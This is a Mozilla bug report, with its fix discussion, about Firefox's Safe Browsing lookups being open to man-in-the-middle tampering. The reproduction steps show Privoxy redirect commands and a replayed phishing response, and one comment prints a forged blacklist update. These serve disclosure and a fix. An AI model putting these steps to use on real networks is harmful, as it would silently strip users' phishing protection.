Note: There are a few cases of duplicates in user autocompletion which are being worked on.

Result of the anti-phishing check can be altered by man-in-the-middle

RESOLVED FIXED in Firefox 3 beta4

Status

()

Toolkit
Safe Browsing
P2
critical
RESOLVED FIXED
11 years ago
3 years ago

People

(Reporter: Fabian Keil, Assigned: dcamp)

Tracking

unspecified
Firefox 3 beta4
x86
FreeBSD
Points:
---
Bug Flags:
blocking-firefox3 +
wanted1.8.1.x -

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:low spoof])

Attachments

(2 attachments)

v1
98.31 KB, patch
Tony Chang (Google)
: review+
Details | Diff | Splinter Review
26.54 KB, patch
Tony Chang (Google)
: review+
Details | Diff | Splinter Review
(Reporter)

Description

11 years ago
User-Agent:       Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.1) Gecko/20061107 Firefox/2.0
Build Identifier: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.1) Gecko/20061107 Firefox/2.0

The per-site anti-phishing check is done unencrypted,
a man-in-the-middle can intercept the request and mark
sites as phishing sites or more importantly prevent
Firefox from displaying the warning.

Another problem is that if Firefox doesn't reach
the anti-phishing server at all, it just stops
displaying phishing warnings without informing the
user about the problem. A man-in-the-middle could
use this to sabotage the update of the blacklist
(which happens encrypted and thus can't be easily altered).

For a man-in-the-middle this could make phishing
actually easier, as a Firefox user who thinks she
is protected will be less careful to check the URL
before submitting login information.

Instead of sending the phishing link through email,
a man-in-the-middle would intercept requests for a valid
login pages and send redirects to his phishing site(s)
(provided the login page is accessed through HTTP).

After the first user has detected the redirect and
submitted the site to the anti-phishing server, the
attack would normally stop working for users of the
phishing protection. An attacker who sabotages
the result, however, can continue the attack much
longer.

Open WLANs and Tor exit nodes would be good positions
to run such attacks.

Reproducible: Always

Steps to Reproduce:
1.) Position yourself between the user and the login page. 
2.) Redirect requests for login pages to your phishing site,
    answer all requests for http://sb.google.com/safebrowsing/*
    with an empty document or just make sure that sb.google.com
    can't be reached.

Actual Results:  
Firefox will no longer warn the user, even if the
phishing sites is already known on the anti-phishing server.

Expected Results:  
Firefox should do all anti-phishing checks through
HTTPS and display a warning if the anti-phishing
server can't be reached or the reached server sends
a redirect (which will be unlikely if HTTPS is used).

To make the main problem visible without too much efforts,
chaining Firefox with Privoxy (3.0.5 beta) will be good enough,
afterwards:
 
#Create an empty file
fk@TP51 ~/test $touch keine-panik.txt

#Start local HTTP server
fk@TP51 ~/test $gatling -i 10.0.0.2 -p 80 -F > /dev/null &
[2] 35458

#Create redirect
fk@TP51 ~/test $echo -e "{+redirect{http://10.0.0.2/keine-panik.txt}}\nsb.google.com/safebrowsing" >> /usr/jails/privoxy-jail/usr/local/etc/privoxy/fk.action

#Test configuration
fk@TP51 ~/test $curl -v -L "http://sb.google.com/safebrowsing/lookup?blah"
* About to connect() to proxy 10.0.0.1 port 8118
*   Trying 10.0.0.1... connected
* Connected to 10.0.0.1 (10.0.0.1) port 8118
> GET http://sb.google.com/safebrowsing/lookup?blah HTTP/1.1
> User-Agent: curl/7.15.5 (i386-portbld-freebsd6.2) libcurl/7.15.5 OpenSSL/0.9.7e zlib/1.2.3
> Host: sb.google.com
> Pragma: no-cache
> Accept: */*
> Proxy-Connection: Keep-Alive
> 
< HTTP/1.0 302 Local Redirect from Privoxy
< Location: http://10.0.0.2/keine-panik.txt
< Content-Length: 0
< Date: Sat, 11 Nov 2006 16:30:01 GMT
< Connection: close
* Closing connection #0
* Issue another request to this URL: 'http://10.0.0.2/keine-panik.txt'
* About to connect() to proxy 10.0.0.1 port 8118
*   Trying 10.0.0.1... connected
* Connected to 10.0.0.1 (10.0.0.1) port 8118
> GET http://10.0.0.2/keine-panik.txt HTTP/1.1
> User-Agent: curl/7.15.5 (i386-portbld-freebsd6.2) libcurl/7.15.5 OpenSSL/0.9.7e zlib/1.2.3
> Host: 10.0.0.2
> Pragma: no-cache
> Accept: */*
> Proxy-Connection: Keep-Alive
> 
< HTTP/1.1 200 Coming Up
< Date: Sat, 11 Nov 2006 16:30:01 GMT
< Content-Type: text/plain
< Server: Gatling/0.8
< Content-Length: 0
< Last-Modified: Sat, 11 Nov 2006 16:29:36 GMT
< Connection: close
* Closing connection #0

A Privoxy-using Firefox version will now stop displaying warnings.
 
To have Firefox mark every site as phishing site one can reuse an
older response send from the anti-phishing server:

#Save a real phishing warning
fk@TP51 ~/test $http_proxy= curl -s "http://sb.google.com/safebrowsing/lookup?sourceid=firefox-antiphish&features=TrustRank&client=Firefox2.0&mozver=1.8.1-0000000000&encver=1&nonce=-681723821&wrkey=MToWATEtBekso5qZrXIR-yHQ&encparams=QbcMZ9%2Bqt5VdpV5UsnZWBpdyArHbnu2h9jqNnnDJ8Q2j4Quvu6mRXSo%2FBhKVb7I11RtHI%2BD21QDy1QUaYpWYJrIQzFE6DaWR2nD6cA8%3D&" -o phishing-alarm.txt

#Change redirect:
fk@TP51 ~/test $sed -i "" -e "s@keine-panik@phishing-alarm@" /usr/jails/privoxy-jail/usr/local/etc/privoxy/fk.action

#Test new configuration
fk@TP51 ~/test $curl -v -L "http://sb.google.com/safebrowsing/lookup?blah"
* About to connect() to proxy 10.0.0.1 port 8118
*   Trying 10.0.0.1... connected
* Connected to 10.0.0.1 (10.0.0.1) port 8118
> GET http://sb.google.com/safebrowsing/lookup?blah HTTP/1.1
> User-Agent: curl/7.15.5 (i386-portbld-freebsd6.2) libcurl/7.15.5 OpenSSL/0.9.7e zlib/1.2.3
> Host: sb.google.com
> Pragma: no-cache
> Accept: */*
> Proxy-Connection: Keep-Alive
> 
< HTTP/1.0 302 Local Redirect from Privoxy
< Location: http://10.0.0.2/phishing-alarm.txt
< Content-Length: 0
< Date: Sat, 11 Nov 2006 16:11:58 GMT
< Connection: close
* Closing connection #0
* Issue another request to this URL: 'http://10.0.0.2/phishing-alarm.txt'
* About to connect() to proxy 10.0.0.1 port 8118
*   Trying 10.0.0.1... connected
* Connected to 10.0.0.1 (10.0.0.1) port 8118
> GET http://10.0.0.2/phishing-alarm.txt HTTP/1.1
> User-Agent: curl/7.15.5 (i386-portbld-freebsd6.2) libcurl/7.15.5 OpenSSL/0.9.7e zlib/1.2.3
> Host: 10.0.0.2
> Pragma: no-cache
> Accept: */*
> Proxy-Connection: Keep-Alive
> 
< HTTP/1.1 200 Coming Up
< Date: Sat, 11 Nov 2006 16:11:58 GMT
< Content-Type: text/plain
< Server: Gatling/0.8
< Content-Length: 11
< Last-Modified: Sat, 11 Nov 2006 15:50:35 GMT
< Connection: close
phishy:1:1
* Closing connection #0

(Excerpts were copy and pasted in different order,
just in case you wondered about the time in the HTTP headers)

Comment 1

11 years ago
If an attacker is MITM'ing you, why would he bother using a hostname on the anti-phishing server's blacklist?  He can choose any hostname that suits his needs and make the site appear there.
Confirmed. Regardless of how unlikely (there are probably more useful malicious attacks if you're in a position to do this), it is possible.

DOS'ing the service would reduce it's effectiveness over time. No big deal in the short run (updates blocked while at the local coffee house?), but we may want some warning UI if we haven't been able to contact the service for some period of time.

Part of the list comes back encrypted (with a key retrieved over a secure SSL connection), but part does not and each part is optional (if the server decides you're up to date that section isn't sent). Besides blocking the service, the MITM could respond with

[goog-black-url 1.9322 update]
+http://www.google.com	c
+http://www.google.com/firefox?client=firefox-a&rls=org.mozilla:en-US:official	c
+https://login.yahoo.com/config/login_verify2?&.src=ym	c
+http://www.paypal.com/	c
+https://sitekey.bankofamerica.com/sas/signonScreen.do?state=CA	c

[goog-white-domain 1.66 update]
+phishydomain.com	1

As Jesse points out, whitelisting the phishing domain is pretty pointless if you can spoof someone's DNS already. Adding tons of legit sites to the blacklist might be "fun" for some pranksters.

Instead of an "update" you could also send a completely new list that would wipe out whatever was there by default, effectively disabling the service until the user could reconnect to the legit service. If the fake server gave version numbers that were slightly behind the user's announced version (it's a parameter of the update URL) then when they did connect they'd get served updates from that point and the service would assume their previous data matched the announced version. If the fake server picked values that were too high the real server will next time simply resend the whole list, undoing the prankster's hard work.
Assignee: nobody → tony
Status: UNCONFIRMED → NEW
Ever confirmed: true
Whiteboard: [sg:low spoof]

Comment 3

11 years ago
On a side note, the servers do support returning signed table updates:
http://sb.google.com/safebrowsing/update?version=goog-sandbox-text:1:-1&wrkey=MTrycXweOeQxyRHZztTRApds

But we disabled support for the regular table updates because it seemed that if someone can intercept traffic, you're in bigger trouble than just getting bad phishing table updates.

I don't think the MAC checking code is in mozilla CVS, but we could port it from Google Toolbar pretty easily.

Also, since we download the lists even in remote look up mode, if the server doesn't respond in something like 5-10 seconds, we should just fall back on the local list.  I've been meaning to file a bug about this.  This seems like a pretty low priority since we're seeing a very small number of users deciding on remote look ups.

Jesse asked a while back if there should be some UI to notify the user if remote lookups are failing.  That sounds reasonable to me, but I'm not exactly sure what it would look like or what the user would do in such a situation (my guess is the user would just ignore it and keep on browsing the web).
(Assignee)

Comment 4

10 years ago
In FFX3 the protocol is changed so that a poisoning during a man-in-the-middle attack will last longer.  This bug should be reevaluated with that in mind...
Flags: blocking-firefox3?
Not only will it last longer, but a MITM attack could easily turn off the SB service now by redirecting SB requests to the trash; as soon as that happens, we silently turn off SB protection. :(

Moving up the priority chain for now.
Flags: blocking-firefox3? → blocking-firefox3+
Priority: -- → P2
Target Milestone: --- → Firefox 3 beta4
(Assignee)

Updated

10 years ago
Assignee: tony → dcamp
(Assignee)

Comment 6

10 years ago
I'm working on a patch to support the signed table updates.  A few things to keep in mind:

a) This requires us to fetch a persistent key from google and present it for each update and gethash request.  The current key-fetching code (a holdover from the firefox2 safebrowsing code) fetches a new key once per session, with a max of one fetch per day.

b) Supporting this will create a new failure condition.  If we can't fetch a key, there's not much we can do but start failing gethash requests (which would currently cause a silent failure to block a site). 

Additionally, the server can tell us that our key is invalid, in which case we're required to drop our key and fetch a new one before requesting again. A MITM can force this rekeying, because the rekey request can't be protected by the signed update.  I'm not sure this is any added problem, because the MITM could just cause gethash results to fail anyway.
(Assignee)

Comment 7

10 years ago
Created attachment 303177 [details] [diff] [review]
v1

Here's a first stab at implementing the MAC for updates and gethash requests.

Rather than failing gethash requests outright if the key server is unavailable, this patch will allow gethash requests to succeed, BUT it will not cache the results.  So a MITM could potentially alter a gethash request, but it would be difficult and he could presumably do worse things directly.

This patch also drops the lookup key when cookies are cleared.

While I was here I got rid of url-crypto.js, which is no longer needed.

There still might be some rough edges and I haven't written unit tests yet, but I wanted to get this up for review ASAP.
Attachment #303177 - Flags: review?
(Assignee)

Comment 8

10 years ago
This patch depends on the nsICryptoHMAC implementation in bug 415799.
Depends on: 415799
(Assignee)

Updated

10 years ago
Attachment #303177 - Flags: review? → review?(tony)

Comment 9

10 years ago
Comment on attachment 303177 [details] [diff] [review]
v1

>   var initialUpdateDelay = 3000;
>   if (tableData != "") {
>     // Add a fuzz of 0-5 minutes.
>-    initialUpdateDelay += Math.floor(Math.random() * (5 * 60 * 1000));
>+    //initialUpdateDelay += Math.floor(Math.random() * (5 * 60 * 1000));
>   }
> 
>   this.currentUpdateChecker_ =

Commented out for testing?


>+  this.updateWaitingForKey = false;

Could this be moved into PROT_ListManager.prototype.newKey_?  It seems to make more sense there.


>+nsresult
>+nsUrlClassifierHashCompleterRequest::HandleMAC(nsACString::const_iterator& begin,
>+                                               const nsACString::const_iterator& end)
>+{

Should we set mVerified to PR_FALSE here so a previously verified mac doesn't cascade through to future updates?


>+  if (!PL_Base64Decode(key.BeginReading(), key.Length(),
>+                       _retval.BeginWriting())) {

Shouldn't this be base64 instead of key?
Attachment #303177 - Flags: review?(tony) → review+
(Assignee)

Comment 10

10 years ago
Created attachment 304859 [details] [diff] [review]
part 2

Second patch (to be applied on top of the first):
* Fixes for review comments
* Bugfix for forwarded update urls with commas in them.
* Updates and adds unit tests.
Attachment #304859 - Flags: review?(tony)

Comment 11

10 years ago
Comment on attachment 304859 [details] [diff] [review]
part 2

-  this.updateWaitingForKey = false;

I don't see where this was re-added.  Other than that, this patch looks good.
Attachment #304859 - Flags: review?(tony) → review+
(Assignee)

Comment 12

10 years ago
(In reply to comment #11)
> (From update of attachment 304859 [details] [diff] [review])
> -  this.updateWaitingForKey = false;
> 
> I don't see where this was re-added.  Other than that, this patch looks good.
> 

newKey_() already sets it to false, this was just redundant.

Comment 13

10 years ago
Ah, I see it.  Looks good.
Keywords: checkin-needed
(Assignee)

Comment 14

10 years ago
We can set checkin-needed once 415799 lands :)
Keywords: checkin-needed
Priority: P2 → P1
(Assignee)

Comment 15

10 years ago
Checking in browser/app/profile/firefox.js;
/cvsroot/mozilla/browser/app/profile/firefox.js,v  <--  firefox.js
new revision: 1.289; previous revision: 1.288
done
Checking in browser/components/safebrowsing/content/globalstore.js;
/cvsroot/mozilla/browser/components/safebrowsing/content/globalstore.js,v  <--  globalstore.js
new revision: 1.21; previous revision: 1.20
done
Checking in browser/components/safebrowsing/content/malware-warden.js;
/cvsroot/mozilla/browser/components/safebrowsing/content/malware-warden.js,v  <--  malware-warden.js
new revision: 1.9; previous revision: 1.8
done
Checking in toolkit/components/url-classifier/content/listmanager.js;
/cvsroot/mozilla/toolkit/components/url-classifier/content/listmanager.js,v  <--  listmanager.js
new revision: 1.26; previous revision: 1.25
done
Checking in toolkit/components/url-classifier/content/url-crypto-key-manager.js;
/cvsroot/mozilla/toolkit/components/url-classifier/content/url-crypto-key-manager.js,v  <--  url-crypto-key-manager.js
new revision: 1.13; previous revision: 1.12
done
Removing toolkit/components/url-classifier/content/url-crypto.js;
/cvsroot/mozilla/toolkit/components/url-classifier/content/url-crypto.js,v  <--  url-crypto.js
new revision: delete; previous revision: 1.7
done
Checking in toolkit/components/url-classifier/public/nsIUrlClassifierDBService.idl;
/cvsroot/mozilla/toolkit/components/url-classifier/public/nsIUrlClassifierDBService.idl,v  <--  nsIUrlClassifierDBService.idl
new revision: 1.21; previous revision: 1.20
done
Checking in toolkit/components/url-classifier/public/nsIUrlClassifierHashCompleter.idl;
/cvsroot/mozilla/toolkit/components/url-classifier/public/nsIUrlClassifierHashCompleter.idl,v  <--  nsIUrlClassifierHashCompleter.idl
new revision: 1.4; previous revision: 1.3
done
Checking in toolkit/components/url-classifier/public/nsIUrlClassifierStreamUpdater.idl;
/cvsroot/mozilla/toolkit/components/url-classifier/public/nsIUrlClassifierStreamUpdater.idl,v  <--  nsIUrlClassifierStreamUpdater.idl
new revision: 1.8; previous revision: 1.7
done
Checking in toolkit/components/url-classifier/src/nsUrlClassifierDBService.cpp;
/cvsroot/mozilla/toolkit/components/url-classifier/src/nsUrlClassifierDBService.cpp,v  <--  nsUrlClassifierDBService.cpp
new revision: 1.65; previous revision: 1.64
done
Checking in toolkit/components/url-classifier/src/nsUrlClassifierHashCompleter.cpp;
/cvsroot/mozilla/toolkit/components/url-classifier/src/nsUrlClassifierHashCompleter.cpp,v  <--  nsUrlClassifierHashCompleter.cpp
new revision: 1.4; previous revision: 1.3
done
Checking in toolkit/components/url-classifier/src/nsUrlClassifierHashCompleter.h;
/cvsroot/mozilla/toolkit/components/url-classifier/src/nsUrlClassifierHashCompleter.h,v  <--  nsUrlClassifierHashCompleter.h
new revision: 1.5; previous revision: 1.4
done
Checking in toolkit/components/url-classifier/src/nsUrlClassifierLib.js;
/cvsroot/mozilla/toolkit/components/url-classifier/src/nsUrlClassifierLib.js,v  <--  nsUrlClassifierLib.js
new revision: 1.10; previous revision: 1.9
done
Checking in toolkit/components/url-classifier/src/nsUrlClassifierListManager.js;
/cvsroot/mozilla/toolkit/components/url-classifier/src/nsUrlClassifierListManager.js,v  <--  nsUrlClassifierListManager.js
new revision: 1.11; previous revision: 1.10
done
Checking in toolkit/components/url-classifier/src/nsUrlClassifierStreamUpdater.cpp;
/cvsroot/mozilla/toolkit/components/url-classifier/src/nsUrlClassifierStreamUpdater.cpp,v  <--  nsUrlClassifierStreamUpdater.cpp
new revision: 1.20; previous revision: 1.19
done
Checking in toolkit/components/url-classifier/src/nsUrlClassifierStreamUpdater.h;
/cvsroot/mozilla/toolkit/components/url-classifier/src/nsUrlClassifierStreamUpdater.h,v  <--  nsUrlClassifierStreamUpdater.h
new revision: 1.14; previous revision: 1.13
done
Checking in toolkit/components/url-classifier/src/nsUrlClassifierUtils.cpp;
/cvsroot/mozilla/toolkit/components/url-classifier/src/nsUrlClassifierUtils.cpp,v  <--  nsUrlClassifierUtils.cpp
new revision: 1.10; previous revision: 1.9
done
Checking in toolkit/components/url-classifier/src/nsUrlClassifierUtils.h;
/cvsroot/mozilla/toolkit/components/url-classifier/src/nsUrlClassifierUtils.h,v  <--  nsUrlClassifierUtils.h
new revision: 1.6; previous revision: 1.5
done
Checking in toolkit/components/url-classifier/tests/unit/head_urlclassifier.js;
/cvsroot/mozilla/toolkit/components/url-classifier/tests/unit/head_urlclassifier.js,v  <--  head_urlclassifier.js
new revision: 1.10; previous revision: 1.9
done
Checking in toolkit/components/url-classifier/tests/unit/test_partial.js;
/cvsroot/mozilla/toolkit/components/url-classifier/tests/unit/test_partial.js,v  <--  test_partial.js
new revision: 1.5; previous revision: 1.4
done
Checking in toolkit/components/url-classifier/tests/unit/test_streamupdater.js;
/cvsroot/mozilla/toolkit/components/url-classifier/tests/unit/test_streamupdater.js,v  <--  test_streamupdater.js
new revision: 1.5; previous revision: 1.4
done
Status: NEW → RESOLVED
Last Resolved: 10 years ago
Priority: P1 → P2
Resolution: --- → FIXED
Are we going to back-port this to Firefox 2? If not--and I suspect not unless we see evidence there is an active threat--then we should unhide this fixed bug.
Flags: wanted1.8.1.x?
Group: security
Flags: wanted1.8.1.x? → wanted1.8.1.x-
(In reply to comment #7)
> (...)
> 
> This patch also drops the lookup key when cookies are cleared.
> 
> (...)

Why is this? What do cookies have to do with this bug at all?
(Note that I wasn't to comment earlier, because this bug was hidden.)
(In reply to comment #7)
> (..)
> this patch will allow gethash requests to succeed, BUT it will not cache the
> results. (...)

I guess you realize this has VERY big implications, especially for users' privacy. So, please, don't mislead general public and update specification (http://code.google.com/p/google-safe-browsing/wiki/Protocolv2Spec) accordingly, because now it says (section 5.2): "When requesting a full-length hash from the server, if the client successfully receives a response, it MUST be stored as the full length hash for the prefix in the list and chunk indicated in the response, for the length of time that the hash prefix is a valid entry in the chunk. The full length hash should always be used when performing lookups instead of the prefix, when it is available. Thus, the client MUST not make any further full length hash requests for that hash."

Comment 19

9 years ago
Bart, you might want to file a new bug rather than commenting in a FIXED bug...
Component: Phishing Protection → Phishing Protection
Product: Firefox → Toolkit
You need to log in before you can comment on or make changes to this bug.